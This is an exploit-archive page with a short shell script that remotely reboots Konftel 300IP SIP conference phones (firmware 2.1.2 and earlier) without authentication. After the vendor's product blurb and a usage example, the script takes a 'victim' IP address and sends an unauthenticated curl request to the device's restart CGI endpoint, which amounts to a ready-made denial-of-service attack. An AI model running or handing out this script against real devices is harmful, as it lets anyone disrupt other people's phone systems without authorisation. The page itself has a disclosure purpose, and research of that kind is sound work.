Konftel 300IP SIP-based Conference Phone - Remote Bypass Reboot



EKU-ID: 3118 CVE: OSVDB-ID:
Author: Todor Donev Published: 2013-04-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# The Konftel 300IP is a flexible SIP-based conference phone,
# perfect for companies that use IP voice services. Its clear,
# natural sound comes from OmniSound HD, Konftel’s patented
# wideband audio technology. The stylishly designed
# Konftel 300IP is packed with intelligent features for more
# efficient conference calls. Record and store meetings on a
# SD memory card. Use the conference guide to call
# pre-programmed groups with just a few simple pushes of a
# button. Conveniently import and export contact details via
# the Web interface. Create your own phone book with the
# personal user profile feature. The Konftel 300IP is also
# ideal for larger conferences since it can accommodate
# expansion microphones, an external wireless headset and a
# PA system. With the Konftel 300IP your company will have
# a conference phone that combines all the benefits of IP
# voice service with innovative new features.
#
# Example usage:
# [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
# Rebooting 192.168.1.180..
# Sleeping 30 secs, before rebooting
# curl: (7) couldn't connect to host
#
# Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends!
   
if [ $# != 1 ]; then
        echo "usg: $0 <victim>"
        exit;
fi
echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit"
echo "Rebooting $1.."
curl http://$1/cgi-bin/dorestart.cgi?doit=Reboot &>/dev/null
echo "Sleeping 30 secs before rebooting"
sleep 30
curl $1